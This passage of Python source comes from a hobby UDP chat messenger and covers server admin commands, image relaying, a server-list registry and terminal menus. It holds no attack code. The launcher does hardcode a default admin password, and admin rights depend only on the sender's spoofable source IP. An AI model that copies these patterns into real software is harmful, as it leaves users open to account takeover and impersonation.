log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] User with IP '+addr[0]+' and Name '+usrn[usr.index(addr[0])]+' left.', l_file)
if ecl:
log(usrn[usr.index(addr[0])]+" left the room.",ch_log, False)
# send all usrs leave message
for o in usr:
if o == addr[0]:
# if it's the person who wants to leave, send their client server an exit message
sock.sendto(bytes("!leave_account_requested_by_self", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
else:
# else send leave message
sock.sendto(bytes(usrn[usr.index(addr[0])]+" left the room.", encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
# debug message
log('Send leave message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
if epw:
auth.pop(int(usrindex))
# remove usr from admin list
if addr[0] in admin_auth:
admin_auth.pop(usrindex)
# remove usr from usr lists
usr.pop(int(usrindex))
usrn.pop(int(usrindex))
usraddr.pop(int(usrindex))
# remove usr from auth list
if addr[0] in auth:
auth.pop(usrindex)
# list command
elif msg[0:5] == '/list':
user_list = ''
c = 0
for o in usrn:
if user_list == '':
user_list = user_list +'' + usrn[c]
else:
user_list = user_list +', ' + usrn[c]
c += 1
if len(usr) == 1:
lmsg ="There is "+str(len(usr))+" person in the room: "+user_list
else:
lmsg = lmsg ="There are "+str(len(usr))+" persons in the room: "+user_list
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] [Server] "+lmsg, l_file)
if ecl:
log(lmsg,ch_log, False)
for o in usr:
sock.sendto(bytes(lmsg, encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if dev:
log('Send userlist to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
elif msg[0:4] == '/img' and addr[0] in usr:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Recived Image from USR: "+usrn[usr.index(addr[0])], l_file)
rcvstr = msg[5:]+','
# Receive every part of the image
while not '}' in list(rcvstr):
data, address = sock.recvfrom(4096)
#print(data.decode())
#log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Reciving... "+data.decode(), l_file)
if address[0] == addr[0]:
#log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Reciving Imagedata: "+data.decode().replace(' ','').replace('\n',''), l_file)
if not '}' in list(data.decode()):
rcvstr += data.decode()+','
else:
dat = data.decode()[:data.decode().index('}')+1]
rcvstr += dat
# Print Json Image data
#print(rcvstr.replace('\n','').replace(' ', ''))
# Load text to json
#f = open("json.json",'w')
#f.write(rcvstr)
#f.close()
ij = json.loads(rcvstr)
name = ij["name"]
if "rick__roll" in name:
for o in usr:
sock.sendto(bytes('!secure_corckrl','utf-8'),(o,4243))
w = int(ij["w"])
h = int(ij["h"])
w2 = w
h2 = h
sc = 1
# shrink image down if needed
while w2 > 38 or h2 > 38:
sc += 1
w2 = int(w/sc)
h2 = int(h/sc)
# get calculated shrink values and shrink
sendji = itj.manage_json(1,sc,rcvstr)
# display
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Image '"+ij["name"]+"':", l_file)
if not '-disIMG' in sys.argv:
itj.json_to_text(1,sc,sendji)
else:
print(" [IMAGE HIDDEN BECAUSE -disIMG IN ARGUMENTS]")
sendspl = sendji.split(',')
# Send first Part of message
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Sending image to usrs", l_file)
for i in range(0,10):
sendspl.append("")
for o in usr:
sock.sendto(bytes('!img '+sendspl[0], 'utf-8'),(o,4243))
time.sleep(0.001)
# Send rest of message
a = len(sendspl)
#print(str(a),str(int(a/10)*10),str(int(a/10)*10 < a))
for i in range(0,int((a)/10)+1):
#print(len(sendspl)-1,i*10+10,int((a)/10))
try:
x = (sendspl[i*10+1]+','+sendspl[i*10+2]+','+sendspl[i*10+3]+','+sendspl[i*10+4]+','+sendspl[i*10+5]+','+sendspl[i*10+6]+','+sendspl[i*10+7]+','+sendspl[i*10+8]+','+sendspl[i*10+9]+','+sendspl[i*10+10]).replace(' ', '')
try:
x = x[:x.index('}')+1]
except:
pass
try:
x = x[:x.index(',,')]
except:
pass
sock.sendto(bytes(x,'utf-8'),(o,4243))
except Exception as e:
#print(e)
pass
time.sleep(0.01)
# Admin commands
elif msg[0:1] == '!':
cmdlist = ['help','chatlog_clear','chatlog_en','chatlog_dis','kick', 'stop', 'reasonkick', 'imp']
def ac(c,istr, ofs = 1, low = True):
if low:
istr = istr[ofs:len(c)+ofs].lower()
c = c.lower()
else:
istr = istr[ofs:len(c)+ofs]
if istr == c:
return True
else:
return False
if addr[0] in admin_auth:
if ac(cmdlist[0],msg, low = False):
hmsg = ' !help Shows this message\n !chatlog_clear Clears the chat log - the log which is sent to a user on join\n !chatlog_dis Disables the chat log and it will no longer be sent to usrs on join\n !chatlog_en Enables the chatlog and all written messages will be sent to joining usrs\n !kick Kicks the Person (usrname)\n !stop Stops the Server.\n !imp Important message with toast for every usr'
sock.sendto(bytes(hmsg, encoding='utf-8'), (addr[0],4243))
if ac(cmdlist[1],msg):
f = open(ch_log, 'w')
f.write('')
f.close()
for o in admin_auth:
if o == addr[0]:
sock.sendto(bytes('You cleared the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} cleared the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
if ac(cmdlist[2],msg):
ecl = True
for o in admin_auth:
if o == addr[0]:
sock.sendto(bytes('You enabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} enabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
if ac(cmdlist[3],msg):
ecl = False
for o in admin_auth:
if o == addr[0]:
sock.sendto(bytes('You disabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} disabled the Chat Log'.format(addr[0]),'utf-8'), (o,4243))
if ac(cmdlist[4],msg):
if not msg[6:len(msg)] in usrn:
print('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USR '+usrn[usr.index(addr[0])]+' tried to kick a person who isn\'t in this room')
sock.sendto(bytes('Sorry but this Person isn\'t in this room','utf-8'), (addr[0],4243))
else:
# get usr index in usr list
usrindex = usrn.index(msg[6:len(msg)])
# log message that usr xy left
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] User with IP '+usr[usrindex]+' and Name '+usrn[usrindex]+' got kicked by '+usrn[usr.index(addr[0])]+'.', l_file)
if ecl:
log(usrn[usr.index(addr[0])]+" left the room.",ch_log, False)
# send all usrs leave message
for o in usr:
if usrn[usr.index(o)] == msg[6:len(msg)]:
# if it's the person being kicked, send their client server an exit message
sock.sendto(bytes("!leave_account_requested_by_self _nonself", encoding='utf-8'), (o,4243))
else:
if o in admin_auth:
sock.sendto(bytes(usrn[usrn.index(msg[6:len(msg)])]+" got kicked by "+usrn[usr.index(addr[0])]+'.', encoding='utf-8'), (o,4243))
else:
# else send leave message
sock.sendto(bytes(usrn[usrn.index(msg[6:len(msg)])]+" left the room.", encoding='utf-8'), (o,4243))
if dev:
# debug message
log('Send leave message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
# remove usr from auth list
if epw:
auth.pop(int(usrindex))
# remove usr from admin list
if usr[usrindex] in admin_auth:
admin_auth.pop(usrindex)
# remove usr from usr lists
usr.pop(int(usrindex))
usrn.pop(int(usrindex))
usraddr.pop(int(usrindex))
# Stop command
if ac(cmdlist[5], msg):
for o in usr:
if not o in admin_auth:
sock.sendto(bytes('Server Stopping'.format(addr[0]),'utf-8'), (o,4243))
else:
sock.sendto(bytes('User {0} Stopped the server'.format(usrn[usr.index(addr[0])]),'utf-8'), (o,4243))
for u in usr:
kick(u, 'Server Closed','SERVER_CLIENT_MANAGER', '_svclosed')
exit()
if ac(cmdlist[6], msg):
tmsg1 = msg.split(' ')
tmsg2 = tmsg1[0]+' '+tmsg1[1]+' '
reason = tmsg1[1]
tusr = msg[len(tmsg2):]
if not tusr in usrn:
print('['+datetime.datetime.now().strftime("%H:%M:%S")+'] USR '+usrn[usr.index(addr[0])]+' tried to kick a person who isn\'t in this room')
sock.sendto(bytes('Sorry but this Person isn\'t in this room','utf-8'), (addr[0],4243))
else:
did = usrn[usr.index(addr[0])]
kick(tusr, reason, did)
if ac(cmdlist[7],msg):
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Important Message: <'+usrn[usr.index(str(addr[0]))]+'> '+msg[1+len(cmdlist[7]+' '):], l_file)
retmsg = '<'+usrn[usr.index(str(addr[0]))]+'> '+msg[1+len(cmdlist[7]+' '):]
for o in usr:
if not o == addr[0]:
sock.sendto(bytes('!important_message '+retmsg, encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if ecl:
log(retmsg,ch_log, False)
if dev:
log('Send message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
else:
sock.sendto(bytes('Error: You are not permitted to do that!', encoding='utf-8'), (addr[0],4243))
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] Error: USR '+usrn[usr.index(addr[0])]+' tried to execute Admin Commands while not authed', l_file)
elif addr[0] == list_server_ip and msg == '_Still Active dude?':
time.sleep(0.1)
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] List Server Ping',l_file)
sock.sendto(bytes('list_update '+cserver_ip+' '+str(PORT)+' '+server_name+' '+str(epw)+' '+str(len(usr)),'utf-8'), (list_server_ip, int(list_server_port)))
elif addr[0] in usr and not msg == '':
if addr[0] in auth or epw == False:
log('['+datetime.datetime.now().strftime("%H:%M:%S")+'] <'+usrn[usr.index(str(addr[0]))]+'> '+msg, l_file)
retmsg = '<'+usrn[usr.index(str(addr[0]))]+'> '+msg
for o in usr:
if not o == addr[0]:
sock.sendto(bytes(retmsg, encoding='utf-8'), (usraddr[usr.index(o)][0],4243))
if ecl:
log(retmsg,ch_log, False)
if dev:
log('Send message to User Ip: '+o+' Name='+usrn[usr.index(o)], l_file)
if ecl:
log(retmsg, ch_log, False)
#strdata = data.decode()
#retmsg = '<'+usrn[usr.index(str(addr[0]))]+'> '+msg + strdata
#con.sendall(retmsg.encode())
# List Server
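# The list server keeps a registry of chat servers (IP, port, name, password
# flag, user count). On every incoming packet it re-pings each registered
# server with '_Still Active dude?' and drops the ones that do not answer,
# and it answers '/list' requests by sending a formatted table to port 4245.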
def list_servers_server(ip = '', PORT = '', log_file = ''):
dev = False
if log_file == '':
l_file = os.path.dirname(os.path.realpath(__file__))+'\\list_server_log.txt'
if not 'Windows' in platform.system():
l_file = os.path.dirname(os.path.realpath(__file__))+'/list_server_log.txt'
else:
l_file = log_file
log('\n\nlog from '+"--"+datetime.datetime.now().strftime("%Y/%m/%d %H:%M:%S")+"--\n", l_file, False)
log('---------------------------------------------', l_file)
log(' JuNi\'s Messenger List Server', l_file)
log(' By JuNi, GitHub: https://github.com/juni4', l_file)
log('---------------------------------------------', l_file)
time.sleep(0.1)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Starting server...", l_file)
dev = False
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Debugmode "+str(dev), l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Setting up server vars", l_file)
SERVER = ""
reg_servers_ip = []
reg_servers_p = []
reg_servers_name = []
reg_servers_epw = []
reg_servers_uc = []
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Creating UDP Socket", l_file)
# Create a UDP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Binding socket to PORT", l_file)
# Bind the socket to the port
server_address = (SERVER, int(PORT))
#print('starting up on {} port {}'.format(*server_address))
sock.bind(server_address)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server opened on port: "+ PORT, l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Done!", l_file)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Awaiting Input...", l_file)
while True:
data, address = sock.recvfrom(4096)
addr = address
msg = data.decode()
#print(str(addr)+': '+data.decode(), "'", sep="")
# refresh server list
c = 0
for o in reg_servers_ip:
try:
sock.sendto(bytes('_Still Active dude?', encoding='utf-8'), (o,int(reg_servers_p[c])))
data2, address = sock.recvfrom(4096)
addr2 = address
msg2 = data2.decode()
larg = msg2.split(' ')
if larg[0] == 'list_update':
reg_servers_ip[c] = larg[1]
reg_servers_name[c] = larg[3]
reg_servers_p[c] = larg[2]
reg_servers_epw[c] = larg[4]
reg_servers_uc[c] = larg[5]
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server with Name "+reg_servers_name[c]+" and IP "+reg_servers_ip[c]+" is stil Active.", l_file)
else:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server with Name "+reg_servers_name[c]+" and IP "+reg_servers_ip[c]+" is inactive and will be removed from Serverlist.", l_file)
reg_servers_ip.pop(c)
reg_servers_name.pop(c)
reg_servers_p.pop(c)
reg_servers_epw.pop(c)
reg_servers_uc.pop(c)
#lspd.connect((reg_servers_ip[c], int(reg_servers_p[c])))
except:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Server with Name "+reg_servers_name[c]+" and IP "+reg_servers_ip[c]+" is inactive and will be removed from Serverlist.", l_file)
reg_servers_ip.pop(c)
reg_servers_name.pop(c)
reg_servers_p.pop(c)
reg_servers_epw.pop(c)
reg_servers_uc.pop(c)
c += 1
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Refreshed server list.", l_file)
if msg[0:13] == 'list_register':
larg = msg.split(' ')
#print(msg)
log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] Added New Server, IP: "+larg[1]+' Port: '+larg[2]+' Name: '+larg[3]+'.', l_file)
reg_servers_ip.append(larg[1])
reg_servers_name.append(larg[3])
reg_servers_p.append(larg[2])
reg_servers_epw.append(larg[4])
reg_servers_uc.append(larg[5])
#print(reg_servers_ip,reg_servers_epw)
elif msg[0:5] == '/list':
sock.sendto(bytes('All known Servers:', encoding='utf-8'), (addr[0],4245))
sock.sendto(bytes(' Name: IP: Port: PW(Y/N): USR:', encoding='utf-8'), (addr[0],4245))
c = 0
for o in reg_servers_ip:
sn = 12-len(reg_servers_name[c])
sip =17-len(reg_servers_ip[c])
sp = 8-len(reg_servers_p[c])
sn2 = ' '*sn
sip2= ' '*sip
if reg_servers_epw[c] == 'True':
pwq = 'Y'
else:
pwq = 'N'
sock.sendto(bytes(' '+reg_servers_name[c]+sn2+reg_servers_ip[c]+sip2+reg_servers_p[c]+' '*sp+pwq+' '*10+reg_servers_uc[c], encoding='utf-8'), (addr[0],4245))
c += 1
sock.sendto(bytes('!system_message:end', encoding='utf-8'), (addr[0],4245))
if dev:
log("["+datetime.datetime.now().strftime("%H:%M:%S")+'] Send serverlist to User Ip: '+o+' Name='+addr[0], l_file)
elif msg[0:5] == '/join':
sock.sendto(bytes("!leave_account_requested_by_self", encoding='utf-8'), (addr[0],4243))
# log and print
def log(log_string, log_file, o = True):
if o:
print(log_string)
f = open(log_file, 'a')
f.write(log_string+'\n')
f.close()
# get -xyz arg in sys.argv
def getarg(arg, alt):
if not arg == '':
if arg in sys.argv:
return sys.argv[sys.argv.index(arg)+1]
else: return alt
arg = sys.argv
# launch the correct 'application'
if len(arg) > 1:
# Server launcher
if '-s' in arg or '-server' in arg[1] or arg[1] == ' server ':
# help
if '-h' in arg:
print('HELP: \n -h Help\n -name Server Name\n -p Server Port\n -lsip IP of List Server\n -lsp Port of List Server\n -els Enable the list server\n -pw Password for Server\n -apw To set the Admin Password\n -disIMG To Disable Images being displayed')
exit()
if '-els' in arg:
els = True
else:
els = False
if '-pw' in arg:
epw = True
else:
epw = False
if '-ecl' in arg:
ecl = True
else:
ecl = False
server(list_server_ip=getarg('-lsip', 'localhost'), list_server_port=getarg('-lsp', '4244'), server_name=getarg('-name', ''), server_port=getarg('-p', '4242'), listtheserver=els, l_file=getarg('-lf', ''), ch_log=getarg('-cl', ''), ecl=ecl, apw=getarg('-apw','jf/eu§nf(7UF+3ef5#]534*'), epw = epw, pw = getarg('-pw', ''))
# Client launcher
if '-c' in arg or '-client' in arg[1] or arg[1] == ' client ':
client()
# List Server launcher
if '-ls' in arg or '-listserver' in arg or arg[1] == ' listserver ':
list_servers_server(PORT = getarg('-p', '4244'), log_file=getarg('-lf', ''))
# Client Server Launcher - For Split Sending & Receiving messages
if '-cs' in arg or '-clientserver' in arg or arg[1] == ' clientserver ':
client_server()
# list servers from list server
if 'list' in arg:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes("/list", encoding='utf-8'), (getarg('-ip', 'localhost'),int(getarg('-p', '4244'))))
sock.close()
# ip and port for list server
SERVER = ""
PORT = 4245
# Buffer size for recv()
BUF_SIZE = 1024
# This is the server.
# Open the server port
#sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
server_address = (SERVER, int(PORT))
# Bind the server to the port
x = True
sock.bind(server_address)
while x:
data, server = sock.recvfrom(4096)
if data.decode() == '!system_message:end':
x = False
else:
print(data.decode())
exit()
#print("["+datetime.datetime.now().strftime("%H:%M:%S")+"] LOL.")
#input()
#log("["+datetime.datetime.now().strftime("%H:%M:%S")+"] .", l_file)
# If you do not enter any extra details, a "UI" will appear to input any data
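# smenu draws simple box-style menus straight in the terminal using ANSI
# colours and Unicode box characters, reading arrow/enter keys via the
# third-party "keyboard" module: a single-choice menu (styl_menu_vert), a
# multi-select menu (styl_menu_vert_mult), a small input form
# (custom_input_menu) and an A/B prompt (prompt).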
class smenu():
def styl_menu_vert(name='ExampleMenu',prompt='Please select one of the following:' , entrys=['Entry 1','Entry 2','Entry 3'],description=['The Entry 1 of the menu. Press ENTER to select it','Lorem Ipsulm','LOL'],backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m', sup = False):
namel = len(name)
namelengh = 44-namel
promptl = 43-len(prompt)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
#lcol = rgb(80,80,80)
lcol = ''
while done == False:
if sel > len(entrys)-1:
sel = len(entrys)-1
if sel < 0:
sel = 0
print(backcolor+' '*50+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'┌'+'─'*44+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+name+'\033[39m'+' '*namelengh+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'├'+'─'*44+'┤'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' '+prompt+'\033[39m'+' '*promptl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c = 0
for object in entrys:
entry = entrys[c]
entryl = 42-len(entry)
if sel == c:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+selcolor+tblack+entry+tres+menucolor+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+entry+tres+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c += 1
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' Description:'+tres+' '*31+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
len_desc1 = 42-len(description[sel][0:40])
len_desc2 = 42-len(description[sel][40:80])
len_desc3 = 42-len(description[sel][80:120])
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
keyboard.read_key(sup)
if keyboard.is_pressed('down'):
sel += 1
if keyboard.is_pressed('up'):
sel -= 1
if keyboard.is_pressed('enter'):
done = True
return sel
os.system('cls')
#print(styl_menu_vert())
def styl_menu_vert_mult(name='ExampleMenu',prompt='Please select one of the following:' , entrys=['Entry 1','Entry 2','Entry 3'],description=['The Entry 1 of the menu. Press ENTER to select it','Lorem Ipsulm','LOL'],backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m', sup = False):
selected = []
for object in entrys:
selected.append(False)
namel = len(name)
namelengh = 44-namel
promptl = 43-len(prompt)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
selv = 0
#lcol = rgb(80,80,80)
lcol = ''
while done == False:
if sel > len(entrys)-1:
sel = len(entrys)-1
if sel < 0:
sel = 0
if selv > 1:
selv = 1
if selv < 0:
selv = 0
print(backcolor+' '*50+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'┌'+'─'*44+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+name+tres+' '*namelengh+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'├'+'─'*44+'┤'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' '+prompt+'\033[39m'+' '*promptl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c = 0
for object in entrys:
entry = ' '+entrys[c]
if selected[c] == True:
entry = '*'+entrys[c]+'*'
entryl = 42-len(entry)
if sel == c and selv == 0:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+selcolor+tblack+entry+tres+menucolor+' '*entryl+'│'+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+entry+tres+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c += 1
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' Description:'+tres+' '*31+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
len_desc1 = 43-len(description[sel][0:40])
len_desc2 = 43-len(description[sel][40:80])
len_desc3 = 43-len(description[sel][80:120])
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if selv==1:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+selcolor+tblack+'OK'+menucolor+' '+tres+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+tblack+'OK '+tres+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
# Only continue when a key is pressed
x = keyboard.read_key(sup)
if keyboard.is_pressed('down'):
if selv == 0:
sel += 1
if keyboard.is_pressed('up'):
if selv == 0:
sel -= 1
if keyboard.is_pressed('left'):
selv -= 1
if keyboard.is_pressed('right'):
selv += 1
if keyboard.is_pressed('enter'):
if selv == 1:
done = True
return selected
else:
if selected[sel]:
selected[sel] = False
else:
selected[sel] = True
while keyboard.is_pressed(x):
pass
os.system('cls')
#print(styl_menu_vert_mult(entrys=['lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol'],description=['lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol','lol']))
#basic_menu()
def custom_input_menu(name = 'Example Prompt', prompt='Please select one of the following:' , entrys=['Entry 1:','Entry 2:','Entry 3:'], description=['The Entry 1 of the menu. Press ENTER to select it','Lorem Ipsulm','LOL'], sup = False,backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m', txt = brgb(171, 171, 171), stxt = brgb(150, 150, 150), default_vals = ['','already something'], space = False):
#nswhitelist = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z"]
#swhitelist = [""]
#blist = str(keyboard.all_modifiers)
c = 0
#print(blist)
#blist = blist.replace('\'', '')
#blist = blist.replace('}', '')
#blist = blist.replace('{', '')
#blist = blist.split(',')
#print(blist)
#c = 0
#for o in blist:
#o = o[0:1].replace(' ', '')+o[1:len(o)]
#blist[c] = o
#c += 1
#print(blist)
#blist.remove('left shift')
#blist.remove('right shift')
#blist.remove('shift')
#print(blist)
if len(entrys)-len(default_vals) > 0:
for i in range(0, len(entrys)-len(default_vals)+1):
default_vals.append('')
inputc = default_vals
for object in entrys:
inputc.append('')
namel = len(name)
namelengh = 44-namel
promptl = 43-len(prompt)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
#lcol = rgb(80,80,80)
lcol = ''
selv = 0
while done == False:
if sel > len(entrys)-1:
sel = len(entrys)-1
if sel < 0:
sel = 0
if selv > 1:
selv = 1
if selv < 0:
selv = 0
print(backcolor+' '*50+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'┌'+'─'*44+'┐'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+name+'\033[39m'+' '*namelengh+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'├'+'─'*44+'┤'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' '+prompt+'\033[39m'+' '*promptl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
c = 0
if space:
print(backcolor+' '*2+menucolor+lcol+'├'+' '*44+'┤'+tres+backcolor+' '*2+'\033[49m')
for object in entrys:
entry = ' '+entrys[c]
entryl = 42-len(entry+' '+inputc[c])-(20-len(inputc[c]))
apl = 20-len(inputc[c])
if sel == c and selv == 0:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+selcolor+tblack+entry+' '+stxt+inputc[c]+' '*apl+tres+menucolor+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+entry+' '+txt+inputc[c]+' '*apl+tres+menucolor+' '*entryl+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if space:
print(backcolor+' '*2+menucolor+lcol+'├'+' '*44+'┤'+tres+backcolor+' '*2+'\033[49m')
c += 1
print(backcolor+' '*2+menucolor+lcol+'│'+tblack+' Description:'+tres+' '*31+'│'+tres+backcolor+' '*2+'\033[49m')
len_desc1 = 43-len(description[sel][0:40])
len_desc2 = 43-len(description[sel][40:80])
len_desc3 = 43-len(description[sel][80:120])
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][0:40]+tres+' '*len_desc1+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][40:80]+tres+' '*len_desc2+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'│'+' '+tblack+description[sel][80:120]+tres+' '*len_desc3+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
if selv==1:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+selcolor+tblack+'OK'+menucolor+' '+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
else:
print(backcolor+' '*2+menucolor+lcol+'│'+' '*41+tblack+'OK '+tres+lcol+'│'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+' '*2+menucolor+lcol+'└'+'─'*44+'┘'+tres+backcolor+' '*2+'\033[49m')
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
# Only continue when a key is pressed
#def b(v = '', a = '', b = ''):
# pass
#keyboard.on_release(b, sup)
x = keyboard.normalize_name(keyboard.read_key(sup))
if keyboard.is_pressed('down'):
if selv == 0:
sel += 1
if keyboard.is_pressed('up'):
if selv == 0:
sel -= 1
if keyboard.is_pressed('left'):
selv -= 1
if keyboard.is_pressed('right'):
selv += 1
elif x == 'enter':
if selv == 1:
done = True
return inputc
else:
if selv == 0:
if x == 'backspace':
inputc[sel] = inputc[sel][0:len(inputc[sel])-1]
elif x == 'space' and len(inputc[sel]) < 20:
inputc[sel] = inputc[sel]+' '
elif x in ["strg","ctrl","shift","umschalt","enter","nach-oben","nach-unten","nach-rechts","nach-links","up","down","left","right"]:
pass
elif len(inputc[sel]) < 20:
inputc[sel] = inputc[sel]+x
#def x(x):
# pass
#keyboard.on_release(x)
while keyboard.is_pressed(x):
pass
os.system('cls')
# Prompt
def prompt(name='ExampleMenu', text = 'This is an A or B prompt. Select a button with the arrow keys and hit enter', abut = 'Cancel', bbut = 'OK', sup = False,backcolor = '\033[44m',menucolor= '\033[47m',selcolor = '\033[100m'):
namel = len(name)
namelengh = 44-namel
promptl = 43-len(text)
done = False
sel = 0
#Colors
tres = '\033[39m'
tblack = '\033[30m'
#lcol = rgb(80,80,80)
lcol = ''
while done == False:
if sel > 1:
sel = 1
if sel < 0:
sel = 0
len_desc1 = 42-len(text[0:40])
len_desc2 = 42-len(text[40:80])
len_desc3 = 42-len(text[80:120])
blen = 42-(len(abut)+len(bbut))
print(backcolor+'\033[34m'+'.'*50+'\033[49m'+'\033[39m')
